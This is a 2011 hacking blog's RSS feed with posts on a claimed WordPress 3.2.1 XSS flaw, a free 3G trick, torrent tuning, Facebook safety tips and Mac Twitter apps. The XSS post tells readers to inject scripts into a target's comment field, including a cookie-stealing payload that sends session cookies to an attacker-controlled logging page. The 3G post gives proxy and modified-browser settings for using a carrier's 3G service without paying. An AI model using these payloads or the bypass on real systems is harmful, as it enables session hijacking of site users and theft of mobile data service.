<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Truths &#187; Ashik</title>
	<atom:link href="http://www.hungry-hackers.com/author/admin/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hungry-hackers.com</link>
	<description>Hacking is fun, If you are a &#34;Hacker&#34;!</description>
	<lastBuildDate>Wed, 11 Jan 2012 19:43:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>False Alarm: XSS Vulnerability in WordPress 3.2.1</title>
		<link>http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html</link>
		<comments>http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html#comments</comments>
		<pubDate>Mon, 15 Aug 2011 21:17:11 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Headline]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2053</guid>
		<description><![CDATA[Dear Friends,

My earlier post about the XSS vulnerability turned out to be a False Alarm. Wordpress allows the privileged users to post comments without filtering the HTML tags but for a normal underprivileged user it will filter the tags. I am sorry for the inconvenience. My Intentions were to make all you guys aware of this vulnerability so that you could save your blog from being hacked.

But now I am glad that WordPress is safe. :)]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2054" title="images" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/images.jpg" alt="" width="225" height="225" />Dear Friends,</p>
<p>My earlier post about the <a title="XSS vulnerability in WordPress 3.2.1" href="http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html" target="_blank">XSS vulnerability in WordPress 3.2.1</a> turned out to be a False Alarm. WordPress allows the privileged users to post comments without filtering the HTML tags but for a normal underprivileged user it will filter the tags. I am sorry for the inconvenience. My Intentions were to make all you guys aware of this vulnerability so that you could save your blog from being hacked.</p>
<p>But now I am glad that WordPress is safe. <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2053&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>XSS Injection Vulnerability in WordPress 3.2.1</title>
		<link>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html</link>
		<comments>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html#comments</comments>
		<pubDate>Mon, 15 Aug 2011 07:19:18 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[WordPress Hacks]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Latest]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2039</guid>
		<description><![CDATA[Bad news for just about every WordPress blogger out there. It has been found that the latest version 3.2.1 of WordPress is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.]]></description>
			<content:encoded><![CDATA[<p><strong>Update</strong>: It will work only if you are logged in. Sorry for the false alarm. My intention were to alert the bloggers so that they could safeguard their blogs. For more details <strong><a title="False Alarm" href="http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html" target="_blank">Click Here</a></strong></p>
<p><img class="alignleft size-full wp-image-2040" title="wordpress-attack" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/wordpress-attack.jpg" alt="" width="290" height="191" />Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.</p>
<h3>How does it work?</h3>
<p>Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection</p>
<blockquote><p><strong>Popup &#8220;alert&#8221; Box</strong><br />
&lt;script&gt;alert(&#8216;hungry-hackers.com&#8217;)&lt;/script&gt;</p></blockquote>
<blockquote><p><strong>Redirect to www.hungry-hackers.com</strong><br />
&lt;script&gt;document.location=&#8221;http://hungry-hackers.com&#8221;&lt;/script&gt;</p></blockquote>
<blockquote><p><strong>Cookie Stealer (need a logging system in place)</strong><br />
&lt;script&gt;document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com&#8221;&lt;/script&gt;</p></blockquote>
<h3>Solution:</h3>
<p>Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong><br />
</strong></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2039&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to Secure your Facebook Account</title>
		<link>http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html</link>
		<comments>http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html#comments</comments>
		<pubDate>Sat, 13 Aug 2011 09:18:22 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Facebook Hacks]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Account]]></category>
		<category><![CDATA[course]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[rafay]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[videos]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2031</guid>
		<description><![CDATA[In the past few years a lot of social apps have been developed which has changed our life completely. Now a days, we have 2 lives, one which is the actual physical life and the other is a virtual life which we live through these social apps. Facebook has become a major part of this virtual life. Nobody wants anyone else to take control of their life. Since our virtual life is online, we need to take care that it is not hacked by any stupid hacker and used for their own benefit.]]></description>
			<content:encoded><![CDATA[<p>In the past few years a lot of social apps have been developed which has changed our life completely. Now a days, we have 2 lives, one which is the actual physical life and the other is a virtual life which we live through these social apps. Facebook has become a major part of this virtual life. Nobody wants anyone else to take control of their life. Since our virtual life is online, we need to take care that it is not hacked by any stupid hacker and used for their own benefit.</p>
<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Security1.jpg"><img class="size-full wp-image-2033 aligncenter" title="Facebook-Security1" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Security1.jpg" alt="" width="400" height="300" /></a></p>
<p>According the Facebook statistics there are more than 750 Million Active facebook users. This makes is a very important target for all the hackers. I have no doubts that the developers at facebook are working 24&#215;7 to make it as secure as possible but the hackers are also working 24&#215;7 to find out a loophole using which they could take control of your account. But for our safety we also need to work a little harder. According to me, the best possible way to do this is by learning how to hack facebook yourself. If you know the loopholes you will never fall for it.</p>
<p>Now you might be thinking, how can I learn about hacking Facebook. If you ask me, I would say google it and learn it yourself. But I know that nobody has got so much time to search for each and every facebook hack possible. Luckily Rafay Baloch, the author of &#8220;A beginners Guide To Ethical Hacking&#8221;, has the answer to your question with his newly created &#8220;<a title="Facebook Hacking Course" href="https://www.plimus.com/jsp/redirect.jsp?contractId=2920214&amp;referrer=hungryhacker" target="_blank">Facebook Hacking Course</a>&#8220;.</p>
<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Hacking-Course.gif"><img class="size-medium wp-image-2032 aligncenter" title="Facebook Hacking Course" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Hacking-Course-300x207.gif" alt="" width="449" height="309" /></a></p>
<p>Facebook hacking course is basically a set of videos which will show you different methods used by hackers to hack Facebook account passwords and how you can protect your self from getting hacked. It will include each and every possible methods that a hacker could use to get your facebook credentials. Along with each video you will get a lab which will tell you exactly how to replicate this attack in a safe environment. It also provides bonus techniques using which you could become anonymous on the internet. If you want to become a hacker this is the first thing you would want to learn. There is also a second bonus with it. You will get email support from none other than Rafay himself.</p>
<p>Now before you make your decision lets hear some words from <strong>Rafay</strong>: <em>&#8220;Friends, if you ask me &#8220;Is Facebook safe?&#8221; my answer would be &#8220;Yes. Its safer than your own computer but remember it is still possible that your facebook account may get hacked and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not facebook. And securing your facebook account depends on how better you can avoid these attacks.&#8221;</em></p>
<p>Now I leave it up to you. You may go and take this course which I would highly recommend or you may leave it up to the hackers to find and hack your account.</p>
<p><strong>How to get the Facebook Hacking Course?</strong></p>
<p><strong></strong>You can get this Facebook hacking course from <a title="Buy Now" href="https://www.plimus.com/jsp/buynow.jsp?contractId=2920214&amp;referrer=hungryhacker" target="_blank">Here</a>.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2031&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free Unlimited 3G Service on Tata Docomo</title>
		<link>http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html</link>
		<comments>http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html#comments</comments>
		<pubDate>Wed, 08 Jun 2011 21:17:21 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[3G Hacks]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[3G]]></category>
		<category><![CDATA[docomo]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[GPRS]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[service]]></category>
		<category><![CDATA[tata]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[Unlimited]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2019</guid>
		<description><![CDATA[<p>Hello Friends,</p>

<p>Are you tired of using the low speed 2G service? I know your answer is 'YES'. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.</p>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2020" style="margin-top: 10px;" title="3g_logo_4" src="http://www.hungry-hackers.com/wp-content/uploads/2011/06/3g_logo_4.jpg" alt="3G Service" width="210" height="132" />Hello Friends,</p>
<p>Are you tired of using the low speed 2G service? I know your answer is &#8216;YES&#8217;. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.</p>
<p style="page-break-before: always;">
<h3>Requirements</h3>
<ol>
<li>Tata Docomo SIM Card with a balance of more than Rs. 1</li>
<li>3G enabled cellphone</li>
</ol>
<h3>Steps</h3>
<ol>
<li>Create New Access Point Using Below Configuration and restart your cellphone.<br />
<blockquote>
<ul>
<li>Name : Tata Docomo or any</li>
<li>Access Point ( APN ) – tata.docomo.dive.in</li>
<li>Homepage : www.google.com or any</li>
<li>Proxy : 202.87.41.147</li>
<li>Proxy Port : 8080</li>
<li>Username : leave blank</li>
<li>Password : leave blank</li>
</ul>
</blockquote>
</li>
<li>Download <a title="Opera Mini Handler Browser" href="http://www.easy-share.com/1915941325/OperaMini4.2HandlerMod.jar" target="_blank"><em>Operamini 4.2 Handler Browser</em></a></li>
<li>Open your Opera mini handler and do the following changes in the Setiings:<br />
<blockquote>
<ul>
<li>Set <em>Divein Settings</em> as Default Settings For Opera Mini</li>
<li>Set <em>http</em> in Custom Field in your Opera Mini handler</li>
<li>Set Socket Server to <em>http://203.115.112.5.server4.operamini.com</em> OR <em>http://10.124.72.171.server4.operamini.com</em></li>
<li>Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)</li>
</ul>
</blockquote>
</li>
<li>Done!! Now use your free unlimited 3G service. Enjoy!!</li>
</ol>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2019&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html/feed</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>Tips to get Maximum Performance from your P2P Softwares</title>
		<link>http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html</link>
		<comments>http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html#comments</comments>
		<pubDate>Mon, 30 May 2011 22:18:46 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Movies]]></category>
		<category><![CDATA[Speed]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Torrents]]></category>
		<category><![CDATA[Tricks]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2001</guid>
		<description><![CDATA[<p>Hello Friends,</p>
<br />
We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares from torrents. While messing with the torrents I found a few things which turned out to be very fruitful. Today I will show you how to use those tricks to get maximum performance from your P2P Softwares.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hello Friends,</p>
<p style="text-align: justify;"><img class="alignleft size-full wp-image-2002" title="p2p" src="http://www.hungry-hackers.com/wp-content/uploads/2011/05/p2p.jpg" alt="" width="200" height="200" />We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares  from torrents. While messing with the torrents I found a few things  which turned out to be very fruitful. Today I will show you how to use  those tricks to get maximum performance from your P2P Softwares.</p>
<p style="text-align: justify;"><em><strong>Note: I use uTorrent so all the following Hacks have been tested on the latest version of uTorrent only. </strong><strong>You may test it on other P2P softwares and let us know about your experience</strong></em></p>
<p style="text-align: justify;"><em><strong><span id="more-2001"></span><br />
</strong></em></p>
<h3 style="text-align: justify;">1. Increase Download Speed</h3>
<p style="text-align: justify;">Do the following changes in the preference of uTorrent.</p>
<p style="text-align: justify;"><em><strong>Go to Options&gt;Preferences&gt;Network</strong></em></p>
<div id="e46" style="text-align: justify;">
<ol>
<li>Under ‘Port used for incomming connections’, enter any port number.  It is best to use a port number above 10000. I use 33333.</li>
<li>Randomize port each time utorrent starts: UNCHECKED. I leave this  unchecked because I have a router. If you do not have a router or a  firewall, and want extra security,check this option.</li>
<li>Enable UPnP port mapping (Windows Xp or later only): UNCHECKED. I  leave this unchecked because I have experienced it slowing down speeds.  It is not needed if you manually port forward.</li>
<li>Add utorrent to Windows Firewall exceptions (Windows XP SP2 or  later only): UNCHECKED (do this only if you have windows firewall  disabled)</li>
<li>Global Maximum upload rate (kb/s): [0: unlimited]: 22 (for 256k connection)</li>
<li>Protocol Encryption: ENABLED. I would recommend everyone to enable this. This can help increase speeds with many ISPs.</li>
<li>Allow incoming Legacy Connections: CHECKED</li>
</ol>
<div id="e44"><em><strong>Go to Options&gt;Preferences&gt;Torrents</strong></em></div>
<div>
<ol>
<li>Global Maximum Number of Connections: 130 (for 256k connection)This  number should not be set too low or the number of connections made to  your torrents will be limited. Setting it too high may cause too much  bandwidth to be used and can cause slowdowns.</li>
<li>Maximum Number of connected peers per torrent: 70 (for 256k  connection)If you see that the peers connected to a specific torrent are  exactly this number, or very close, increase this number to improve  speeds.</li>
<li>Number of upload slots per torrent: 3 (for 256k connection)This  depends on how much you want to upload to other users. Do not set too  low or it may affect download speeds.</li>
<li>Use additional upload slots if upload speed &lt;90%: CHECKED</li>
<li>Maximum number of active torrents: 2 (for 256k connection)</li>
<li>Maximum number of active downloads: 1 (for 256k connection)</li>
<li>Enable DHT Network: CHECKEDThis is recommended to be checked to  improve speeds. More people will be available for sharing if this is  checked.</li>
<li>Enable DHT for new torrents: CHECKED</li>
<li>Enable Peer Exchange: CHECKED</li>
<li>Enable scrapping: CHECKED</li>
<li>Pre-allocate all files: CHECKED</li>
<li>Append .!ut to incomplete files: UNCHECKED</li>
</ol>
<div><em><strong>If you have a firewall </strong></em></div>
<div id="e40">
<ol>
<li>Open up the options/preferences/settings for the firewall – usually your firewall will have an icon to click in the taskbar</li>
<li>Look for the keywords “allow list” or “programs”</li>
<li>Add the application you want to give access to the internet</li>
<li>Make sure to save your settings when you are done</li>
</ol>
</div>
<div id="e39"><em><strong>If you have a router</strong></em></div>
<div>
<ol>
<li>Go to start&gt;run&gt;type cmd, press enter&gt;type ipconfig, press enter</li>
<li>Remember both your ip address and your default gateway</li>
<li>Type in your default gateway into your default browser, a password  prompt may come up. The default username and password are admin for my  router</li>
<li>Under ‘Applications’ fill out one line for each p2p client you use</li>
<li>You need to use your ip address, the correct port range and set either tcp or udp</li>
<li>You can find and change the ports in the actual p2p client’s settings, just make sure they are the same in the router</li>
<li>Most p2p apps need both tcp and udp checked, if you are not sure check your p2p client’s FAQ</li>
<li>Save your settings</li>
</ol>
</div>
</div>
</div>
<h3 style="text-align: justify;">2. Block Fake Peers</h3>
<p style="text-align: justify;">Anti-P2P organizations are actively polluting P2P networks with fake  peers, which send out fake or corrupt data in order to waste bandwidth  and slow down file transfers. At its worst, when downloading major  copyrighted torrents, as much as a fourth of the peers you are connected  to can be attributed to various Anti-P2P agencies. There is also a much  more serious side to this. Once you’ve established a connection to one  of these fake “peers”, your IP has been logged and will most likely be  sent to the RIAA/MPAA.</p>
<p style="text-align: justify;">But there is a way to fight back! If you are using the latest uTorrent, you can employ a little known feature called IP filtering. The author of uTorrent has gone out of his way to hide it, but it’s there nonetheless. But before we can activate this filter, we need to retrieve a list of currently known Anti-P2P organization IPs.</p>
<p style="text-align: justify;">This is most easily done by downloading the <a title="Latest Blacklist" href="http://www.easy-share.com/1915785079/µtorrent ipfilter updater.zip" target="_blank">latest blacklist</a> from Bluetack (the same people who wrote SafePeer for the Azureus BT client).</p>
<p style="text-align: justify;">This list is updated daily, and contains all known Anti-P2P organizations, trackers and peers, aswell as all known Goverment/Military IP addresses as collected by the Bluetack team. Once downloaded, extract and rename the file to “ipfilter.dat” in preparation for the final step.</p>
<p style="text-align: justify;">To make the list available to uTorrent, you need to put it in %AppData%\uTorrent\. So type this into the Address Bar, or click Start -&gt; Run and type it there. After placing the ipfilter.dat in this folder, start uTorrent and go into preferences (Ctrl+P), then click on “Advanced”. In the right hand pane, make sure that “ipfilter.enable” is set to true, and then close the dialog. That’s it for the configuration.</p>
<p style="text-align: justify;">You can verify that the list has been loaded by looking under the “Logging” tab of uTorrent, where you should see the line “Loaded ipfilter.dat (X entries)”.</p>
<h3 style="text-align: justify;">3. Hide your IP</h3>
<p style="text-align: justify;">Your IP address is your online identity and could be used by hackers to  break into your computer, steal personal information, or commit other  crimes against you. <a title="Hide My IP" href="http://www.hide-my-ip.com/?id=5684" target="_blank"><em>Hide My IP</em></a> allows you to surf anonymously, change  your IP address, prevent identity theft, and guard against hacker  intrusions. This software can not only be used in case of hiding your IP from other peers but also useful if you want to browse internet anonymously.</p>
<p style="text-align: justify;">
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2001&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>6 Tips to Avoid Facebook Viruses and Spam Messages</title>
		<link>http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html</link>
		<comments>http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html#comments</comments>
		<pubDate>Sat, 05 Mar 2011 08:57:16 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Facebook Hacks]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1953</guid>
		<description><![CDATA[Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren't very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first place.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/03/Facebook.jpg"><img class="size-full wp-image-1955 alignleft" title="Facebook" src="http://www.hungry-hackers.com/wp-content/uploads/2011/03/Facebook.jpg" alt="" width="300" height="240" /></a>Facebook, the biggest social network with 500 million users, provides an  interface to hit an unsuspecting crowd with malware and viruses. These viruses aren&#8217;t very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first  place.</p>
<h3 style="text-align: justify;">How to avoid it?</h3>
<p style="text-align: justify;"><strong>1. Think before you Act</strong>. Viruses on Facebook are  sneaky. The hackers and cybercriminals who want your information know  that Facebook users will often click on an interesting post without a  moment&#8217;s thought. If a post sounds a bit over-the-top like a headline  out of a tabloid, this is your first warning sign.</p>
<p style="text-align: justify;"><strong>2. Try to avoid Links and videos with Catchy words like  &#8220;funniest  ever,&#8221; &#8220;most hilarious video on Facebook,&#8221; or &#8220;you&#8217;ve got to see this.&#8221;</strong> Do some keyword research to see if the post in question comes up in a  search engine with information about a current virus or trojan.</p>
<p style="text-align: justify;"><strong>3. Check the poster of the Suspicious content.</strong> If you  receive a message from someone you do not know, this is an obvious red  flag. Facebook video viruses also tend to pop  up in your news feed or on your wall from friends you haven&#8217;t talked to  in a while. Unfortunately, it&#8217;s likely this friend has already fallen  victim to the latest virus on Facebook. After clicking on the story  themselves, the message was sent out to all of their friends as well.</p>
<p style="text-align: justify;"><strong>4 Avoid messages that have been posted by multiple users</strong> as the  virus spreads among your friends who were not so cautious. If a link with title such as &#8220;Sexiest video ever&#8221; shows up all over your feed from all kinds of  people (perhaps friends you would not expect to make such a post), this  is another warning sign. Similar direct messages are a likely variant of  the notorious Facebook Koobface virus which has used this approach in  the past.</p>
<p style="text-align: justify;"><strong>5. Do not fall for the &#8220;typical&#8221; money-transfer schemes.</strong> Chat  messages from friends needing funds will usually sound suspicious.  Everything can&#8217;t be screened before posting, so money transfer scams and  hoax applications still find their way on to Facebook. You should also  avoid applications that claim to do a full &#8220;Error check&#8221; or fix security  problems related to your profile.</p>
<p style="text-align: justify;"><strong>6. Update your anti-virus software frequently.</strong> If you do  accidentally click on a post before realizing it is a hoax, do not click  on any further links or downloads. If it&#8217;s too late and you have  already been infected, the Facebook virus removal process may be  effortless if you have a good anti-virus program to catch the virus,  trojan or other malware early on.</p>
<h3 style="text-align: justify;">What&#8217;s Next?</h3>
<p style="text-align: justify;">These were few important tips to safeguard your facebook account but your job isn&#8217;t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.</p>
<p style="text-align: justify;">If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don&#8217;t fall victim of it.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1953&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>9 Best Twitter Desktop Apps for Mac</title>
		<link>http://www.hungry-hackers.com/2011/02/9-best-twitter-desktop-apps-for-mac.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/9-best-twitter-desktop-apps-for-mac.html#comments</comments>
		<pubDate>Thu, 17 Feb 2011 16:49:44 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Internet News]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[Apps]]></category>
		<category><![CDATA[Best]]></category>
		<category><![CDATA[desktop]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[ipad]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[Review]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1246</guid>
		<description><![CDATA[The popularity of Twitter has increased tremendously in past few years. As a result a lot of Twitter Desktop applications are available to the users for download these days. These applications allow you to receive and post Tweets from your desktop without visiting your Twitter.com page. To reduce your burden of finding the appropriate app for you from such a big pool of apps, we have compiled a list of Best Twitter Desktop apps available in the market.]]></description>
			<content:encoded><![CDATA[<p>Hello Friends,</p>
<p>The popularity of Twitter has increased tremendously in past few years. As a result a lot of Twitter Desktop applications are available to the users for download these days. These applications allow you to receive  and post Tweets from your desktop without visiting your  Twitter.com page. To reduce your burden of finding the appropriate app for you from such a big pool of apps, we have compiled a list of Best Twitter Desktop apps available in the market. Earlier I had compiled a list of <a href="../2010/01/20-best-twitter-desktop-apps-for-windows.html" target="_blank">20 Best Twitter Desktop Apps for Windows</a>. Today I give you 9 Best Twitter Apps for Mac.</p>
<h3>1. EventBox</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/eventbox.png"><img class="size-full wp-image-1884  aligncenter" title="eventbox" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/eventbox.png" alt="" width="569" height="283" /></a></p>
<p style="text-align: justify;">This just-for-Mac app is a favorite of many because it supports Twitter, Facebook, Flickr integration, feed reading with Google Reader and internet trend watching with Reddit and Digg<a rel="http://www.blippr.com/apps/336668-Digg.whtml" href="http://www.blippr.com/apps/336668-Digg" target="_blank"> </a>. Keyboard shortcuts, hotkeys, Instapaper integration, and photo uploads to Flickr and Facebook make <a href="http://thecosmicmachine.com/" target="_blank">EventBox</a> pretty nifty. It’s also got a very slick interface with a navigation menu on the left-hand side.</p>
<h3>2. Mac Lounge</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Mac-Lounge.png"><img class="size-full wp-image-1885  aligncenter" title="Mac Lounge" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Mac-Lounge.png" alt="" width="474" height="550" /></a></p>
<p style="text-align: justify;"><a href="http://loungeapp.com/mac/" target="_blank">This app</a> is incredibly appealing for its dead simple, single column interface and respectable feature set. We, of course, love the multiple account support, but also appreciate saved searches, quick access to view followers and following, and tweet options to link to tweet, copy tweet, or copy tweet URL. There’s also an accompanying iPhone app, which syncs with the desktop version and greatly improves the app’s relevance.</p>
<h3>3. Nambu</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/nambu.png"><img class="size-full wp-image-1886  aligncenter" title="nambu" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/nambu.png" alt="" width="210" height="300" /></a></p>
